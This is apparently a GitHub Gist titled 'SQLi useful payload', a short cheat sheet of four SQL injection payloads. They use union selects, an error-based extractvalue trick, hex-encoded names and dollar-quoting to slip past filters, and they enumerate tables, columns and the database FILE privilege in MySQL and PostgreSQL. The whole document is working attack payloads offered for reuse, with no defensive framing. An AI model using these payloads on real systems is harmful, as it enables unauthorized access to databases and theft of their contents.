Last active
November 18, 2017 08:16
-
-
Save veeeeeeeeeee/f62e4afc17608b8415b2e375eee7adf7 to your computer and use it in GitHub Desktop.
SQLi useful payload
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| select 1,2,grantee, is_grantable from information_schema.user_privileges where privilege_type = conv(0x66696c65,16,2)-- | |
| and extractvalue(0x0a,concat(0x0a,(select column_name from information_schema.columns where table_name = 0x6d656d626572 limit 1 offset 2)))-- | |
| union all select group_concat(table_name from information_schema.tables) | |
| select string_agg(column_name, chr(20)) from information_schema.columns where table_name = $$users$$ |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment